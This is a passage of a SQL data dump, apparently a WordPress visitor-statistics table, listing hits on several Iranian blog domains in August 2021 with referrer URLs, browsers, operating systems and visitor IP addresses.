(12802,'2021-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.122','000',0,2,0),
(12803,'2021-08-11','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.81.227.93','000',0,13,0),
(12804,'2021-08-11','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.227.241','000',0,2,0),
(12805,'2021-08-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12806,'2021-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.55.175.62','000',0,2,0),
(12807,'2021-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12808,'2021-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.123.228','000',0,2,0),
(12809,'2021-08-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12810,'2021-08-11','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','5.188.48.217','000',0,2,0),
(12811,'2021-08-11','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','50.31.21.10','000',0,2,0),
(12812,'2021-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12813,'2021-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.190.99','000',0,1,0),
(12814,'2021-08-11','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','103.231.89.163','000',0,5,0),
(12815,'2021-08-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(12816,'2021-08-11','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(12817,'2021-08-11','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(12818,'2021-08-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.216.187.245','000',0,2,0),
(12819,'2021-08-11','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.197.213.110','000',0,1,0),
(12820,'2021-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.130','000',0,2,0),
(12821,'2021-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.197.14','000',0,1,0),
(12822,'2021-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12823,'2021-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12824,'2021-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12825,'2021-08-11','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','41.33.103.9','000',0,2,0),
(12826,'2021-08-12','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','70.27.168.245','000',0,1,0),
(12827,'2021-08-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12828,'2021-08-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.232.21.152','000',0,60,0),
(12829,'2021-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12830,'2021-08-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.88.35.43','000',0,2,0),
(12831,'2021-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,2,0),
(12832,'2021-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(12833,'2021-08-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(12834,'2021-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.131.252','000',0,2,0),
(12835,'2021-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.142.209','000',0,1,0),
(12836,'2021-08-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(12837,'2021-08-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(12838,'2021-08-12','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','131.100.157.0','000',0,2,0),
(12839,'2021-08-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','195.154.49.16','000',0,2,0),
(12840,'2021-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12841,'2021-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(12842,'2021-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12843,'2021-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12844,'2021-08-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.16.223.151','000',0,2,0),
(12845,'2021-08-12','http://82.102.9.14/blog','Chrome','OS X','10.12.2',NULL,NULL,'','47.245.53.145','000',0,1,0),
(12846,'2021-08-12','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','103.68.0.194','000',0,2,0),
(12847,'2021-08-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.4.118','000',0,1,0),
(12848,'2021-08-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.130','000',0,2,0),
(12849,'2021-08-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(12850,'2021-08-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.155.114','000',0,2,0),
(12851,'2021-08-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.216.187.235','000',0,2,0),
(12852,'2021-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.97.128.209','000',0,7,0),
(12853,'2021-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.223.158','000',0,2,0),
(12854,'2021-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(12855,'2021-08-13','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','184.22.142.181','000',0,2,0),
(12856,'2021-08-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','91.199.42.21','000',0,13,0),
(12857,'2021-08-13','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','102.165.54.222','000',0,2,0),
(12858,'2021-08-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','138.219.121.57','000',0,13,0),
(12859,'2021-08-13','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.95.224.228','000',0,2,0),
(12860,'2021-08-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12861,'2021-08-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.239.142.187','000',0,2,0),
(12862,'2021-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.164.49','000',0,1,0),
(12863,'2021-08-13','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','66.115.181.99','000',0,3,0),
(12864,'2021-08-13','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(12865,'2021-08-13','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.142.35','000',0,1,0),
(12866,'2021-08-13','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.30.89','000',0,1,0),
(12867,'2021-08-13','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','181.37.208.77','000',0,2,0),
(12868,'2021-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,2,0),
(12869,'2021-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12870,'2021-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12871,'2021-08-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.70.114','000',0,2,0),
(12872,'2021-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(12873,'2021-08-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.237','000',0,2,0),
(12874,'2021-08-13','http://design-arena.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','46.21.250.195','000',0,1,0),
(12875,'2021-08-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,4,0),
(12876,'2021-08-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12877,'2021-08-14','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','5.188.48.217','000',0,1,0),
(12878,'2021-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.228.234','000',0,2,0),
(12879,'2021-08-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12880,'2021-08-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12881,'2021-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.39.132','000',0,1,0),
(12882,'2021-08-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12883,'2021-08-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.77','000',0,2,0),
(12884,'2021-08-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12885,'2021-08-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,3,0),
(12886,'2021-08-14','http://ictbank.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','84.17.60.172','000',0,2,0),
(12887,'2021-08-14','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','187.65.239.102','000',0,2,0),
(12888,'2021-08-14','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.213','000',0,1,0),
(12889,'2021-08-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12890,'2021-08-15','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','152.70.121.148','000',0,1,0),
(12891,'2021-08-15','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,3,0),
(12892,'2021-08-15','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','14.237.147.149','000',0,2,0),
(12893,'2021-08-15','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','190.6.124.66','000',0,2,0),
(12894,'2021-08-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12895,'2021-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.210.124','000',0,2,0),
(12896,'2021-08-15','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.119.122.55','000',0,1,0),
(12897,'2021-08-15','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.16','000',0,2,0),
(12898,'2021-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.237.145','000',0,1,0),
(12899,'2021-08-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12900,'2021-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(12901,'2021-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(12902,'2021-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12903,'2021-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12904,'2021-08-15','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','103.13.29.198','000',0,1,0),
(12905,'2021-08-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12906,'2021-08-15','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','167.99.10.168','000',0,2,0),
(12907,'2021-08-16','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','14.236.185.56','000',0,2,0),
(12908,'2021-08-16','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(12909,'2021-08-16','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.242','000',0,1,0),
(12910,'2021-08-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.222.93.174','000',0,2,0),
(12911,'2021-08-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12912,'2021-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.162.188','000',0,2,0),
(12913,'2021-08-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.212.57','000',0,1,0),
(12914,'2021-08-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(12915,'2021-08-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','92.35.111.100','000',0,1,0),
(12916,'2021-08-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12917,'2021-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.121.80','000',0,1,0),
(12918,'2021-08-16','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','113.23.17.88','000',0,2,0),
(12919,'2021-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.127.56.236','000',0,1,0),
(12920,'2021-08-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12921,'2021-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(12922,'2021-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(12923,'2021-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12924,'2021-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12925,'2021-08-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12926,'2021-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','168.91.71.153','000',0,1,0),
(12927,'2021-08-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(12928,'2021-08-17','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(12929,'2021-08-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12930,'2021-08-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.227.214','000',0,2,0),
(12931,'2021-08-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.151.73.122','000',0,2,0),
(12932,'2021-08-17','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','95.184.108.92','000',0,2,0),
(12933,'2021-08-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12934,'2021-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(12935,'2021-08-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','151.106.40.161','000',0,2,0),
(12936,'2021-08-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12937,'2021-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.74.15','000',0,2,0),
(12938,'2021-08-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(12939,'2021-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.200.175','000',0,1,0),
(12940,'2021-08-17','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','185.253.97.235','000',0,1,0),
(12941,'2021-08-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,2,0),
(12942,'2021-08-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12943,'2021-08-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12944,'2021-08-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.167.142','000',0,2,0),
(12945,'2021-08-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(12946,'2021-08-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12947,'2021-08-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(12948,'2021-08-18','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','190.237.24.91','000',0,2,0),
(12949,'2021-08-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12950,'2021-08-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.68.38.133','000',0,1,0),
(12951,'2021-08-18','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(12952,'2021-08-18','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,2,0),
(12953,'2021-08-18','http://www.ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','42.193.45.103','000',0,1,0),
(12954,'2021-08-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12955,'2021-08-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12956,'2021-08-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.135.137.126','000',0,2,0),
(12957,'2021-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.51.156','000',0,2,0),
(12958,'2021-08-18','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.111','000',0,1,0),
(12959,'2021-08-18','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.243','000',0,1,0),
(12960,'2021-08-18','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,7,0),
(12961,'2021-08-18','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','190.114.58.47','000',0,2,0),
(12962,'2021-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.69.39','000',0,1,0),
(12963,'2021-08-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','191.96.168.191','000',0,2,0),
(12964,'2021-08-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(12965,'2021-08-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12966,'2021-08-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,2,0),
(12967,'2021-08-18','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(12968,'2021-08-18','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.146','000',0,2,0),
(12969,'2021-08-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12970,'2021-08-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','192.151.158.244','000',0,2,0),
(12971,'2021-08-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','188.143.232.14','000',0,2,0),
(12972,'2021-08-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,3,0),
(12973,'2021-08-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.194','000',0,2,0),
(12974,'2021-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.210.43','000',0,2,0),
(12975,'2021-08-19','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','69.159.79.112','000',0,1,0),
(12976,'2021-08-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12977,'2021-08-19','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','193.137.95.10','000',0,2,0),
(12978,'2021-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.255.68.89','000',0,6,0),
(12979,'2021-08-19','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.4.120','000',0,1,0),
(12980,'2021-08-19','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','182.48.83.57','000',0,1,0),
(12981,'2021-08-19','https://inspiredbygina.com/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','182.48.83.58','000',0,1,0),
(12982,'2021-08-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(12983,'2021-08-19','http://ictbank.ir/','Firefox','Ubuntu','Unknown',NULL,NULL,'','72.224.70.129','000',0,1,0),
(12984,'2021-08-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,2,0),
(12985,'2021-08-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12986,'2021-08-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','23.92.20.94','000',0,2,0),
(12987,'2021-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.54.73','000',0,2,0),
(12988,'2021-08-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(12989,'2021-08-19','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,6,0),
(12990,'2021-08-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.238.54','000',0,1,0),
(12991,'2021-08-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.245.237.226','000',0,2,0),
(12992,'2021-08-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(12993,'2021-08-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.226','000',0,1,0),
(12994,'2021-08-19','http://82.102.9.14/blog/','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.155','000',0,1,0),
(12995,'2021-08-20','http://m.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,7,0),
(12996,'2021-08-20','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(12997,'2021-08-20','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','113.120.13.91','000',0,1,0),
(12998,'2021-08-20','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.103.58','000',0,5,0),
(12999,'2021-08-20','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.214','000',0,3,0),
(13000,'2021-08-20','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,4,0),
(13001,'2021-08-20','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13002,'2021-08-20','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','103.105.252.145','000',0,1,0),
(13003,'2021-08-20','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','49.234.43.244','000',0,5,0),
(13004,'2021-08-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(13005,'2021-08-20','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(13006,'2021-08-20','http://ictbank.ir/','Firefox','Windows','6.1',NULL,NULL,'','192.95.42.42','000',0,3,0),
(13007,'2021-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.121.200','000',0,2,0),
(13008,'2021-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.64.80','000',0,1,0),
(13009,'2021-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.111.249','000',0,1,0),
(13010,'2021-08-20','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,2,0),
(13011,'2021-08-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.175.131.57','000',0,1,0),
(13012,'2021-08-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.90','000',0,2,0),
(13013,'2021-08-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.24.233.105','000',0,2,0),
(13014,'2021-08-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,3,0),
(13015,'2021-08-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13016,'2021-08-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,2,0),
(13017,'2021-08-20','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','178.221.70.161','000',0,2,0),
(13018,'2021-08-20','http://ictbank.ir/','Opera','Windows','6.1',NULL,NULL,'','94.176.238.95','000',0,3,0),
(13019,'2021-08-20','http://ictbank.ir/blog/wp-comments-post.php','Opera','Windows','6.1',NULL,NULL,'','182.48.245.34','000',0,1,0),
(13020,'2021-08-21','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','190.87.162.57','000',0,1,0),
(13021,'2021-08-21','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.141.232.124','000',0,1,0),
(13022,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.220.107.247','000',0,1,0),
(13023,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.201.21.146','000',0,1,0),
(13024,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.36','000',0,2,0),
(13025,'2021-08-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.95.237.48','000',0,2,0),
(13026,'2021-08-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,2,0),
(13027,'2021-08-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.16.36.234','000',0,13,0),
